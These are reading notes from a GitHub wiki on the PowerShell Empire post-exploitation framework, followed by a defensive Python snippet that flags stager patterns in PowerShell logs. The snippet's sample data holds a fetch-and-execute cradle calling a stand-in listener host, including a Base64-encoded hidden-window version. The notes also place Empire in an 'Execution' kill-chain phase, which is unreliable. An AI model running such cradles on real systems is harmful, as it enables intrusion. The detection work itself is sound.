401d8 read27 - carlosjorr/reading-notes GitHub Wiki
Persistence
What is one of the major advantages of PowerShell Empire?
One of the major advantages of PowerShell Empire is its ability to carry out post-exploitation tasks and lateral movement while evading traditional security controls. Because PowerShell is a legitimate, widely used scripting language on Windows systems, Empire's activity blends in with normal administrative use and is less likely to be flagged by antivirus or intrusion detection systems.
What are some of the APT groups that have been known to use PS Empire and into which step of the Cyber Kill Chain does the use of PS Empire fall?
Several Advanced Persistent Threat (APT) groups have been known to use PowerShell Empire in their operations. Some of these groups include:
APT29 (Cozy Bear): A Russian state-sponsored group.
APT32 (OceanLotus): A Vietnamese state-sponsored group.
APT33 (Elfin): A group associated with Iran.
APT34 (OilRig): Another Iranian-associated group.
The use of PowerShell Empire typically falls under the "Execution" phase of the Cyber Kill Chain. This is the phase where the attacker gains a foothold in the target system and executes malicious code or commands to establish a persistent presence.
What are the four main components needed to pull off an attack using PS Empire?
To pull off an attack using PowerShell Empire, four main components are needed:
Listener: This is the component that waits for the compromised system to initiate communication with the attacker's infrastructure. It acts as a bridge for sending and receiving commands between the attacker and the compromised system.
Module: A module is a piece of PowerShell code that performs a specific task, such as gathering system information, spreading laterally, or exfiltrating data. PowerShell Empire provides a variety of modules to perform different actions on the compromised system.
Stager: The stager is a small piece of code that is initially executed on the victim system. It serves as the starting point for establishing communication with the attacker's infrastructure. The stager is responsible for downloading and executing the main payload.
Payload: The payload is the actual code or script that carries out the desired malicious actions on the compromised system. It can involve activities like lateral movement, data theft, or running arbitrary commands.
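Because the stager described above has to fetch the payload from the listener and run it in memory, PowerShell script block logging (Event ID 4104) is where a defender sees it happen. The following is an added example, not part of these notes or of the Empire project: it triages constructed sample records for that download-and-execute pattern, decoding a Base64 -EncodedCommand first so the encoding cannot hide it; the record shape and the ScriptBlockText field name are assumptions.

```python
import base64
import re
# Indicators implied by the stager description above: a small launcher that hides its
# window, skips the profile, and fetches the real payload to run in memory.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "download_cradle": re.compile(r"Net\.WebClient|DownloadString|Invoke-WebRequest|\biwr\b", re.I),
    "in_memory_exec": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
}
ENCODED = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{24,})", re.I)

def decode_encoded_command(text):
    """Return the UTF-16LE plaintext behind an -EncodedCommand argument, else None."""
    m = ENCODED.search(text)
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def score_script_block(text):
    """Names of matched indicators; the decoded form is scanned too, so Base64 hides nothing."""
    decoded = decode_encoded_command(text)
    hits = {"encoded_command"} if decoded is not None else set()
    for name, pattern in INDICATORS.items():
        if pattern.search(text) or (decoded and pattern.search(decoded)):
            hits.add(name)
    return hits

def triage(events):
    """(record id, sorted indicators) for events showing the stager pattern itself: a download
    cradle feeding in-memory execution. Launcher flags alone are only supporting evidence."""
    scored = [(e["id"], score_script_block(e["ScriptBlockText"])) for e in events]
    return [(rid, sorted(h)) for rid, h in scored if {"download_cradle", "in_memory_exec"} <= h]

# Constructed sample records in the shape of PowerShell Event ID 4104 (script block logging).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://listener.example.test/stage')"
EVENTS = [
    {"id": 1, "ScriptBlockText": "Get-ChildItem C:\\Users | Sort-Object LastWriteTime"},
    {"id": 2, "ScriptBlockText": "powershell -NoP -W Hidden -Enc "
                                 + base64.b64encode(CRADLE.encode("utf-16-le")).decode()},
    {"id": 3, "ScriptBlockText": CRADLE},
    {"id": 4, "ScriptBlockText": "Invoke-WebRequest https://example.test/report.csv -OutFile report.csv"},
]

if __name__ == "__main__":
    for record_id, hits in triage(EVENTS):
        print(f"event {record_id}: stager-like ({', '.join(hits)})")
```

Record 4 downloads a file but never executes it in memory, so it is reported only as supporting evidence rather than flagged; records 2 and 3 show the full stager pattern, record 2 only after decoding.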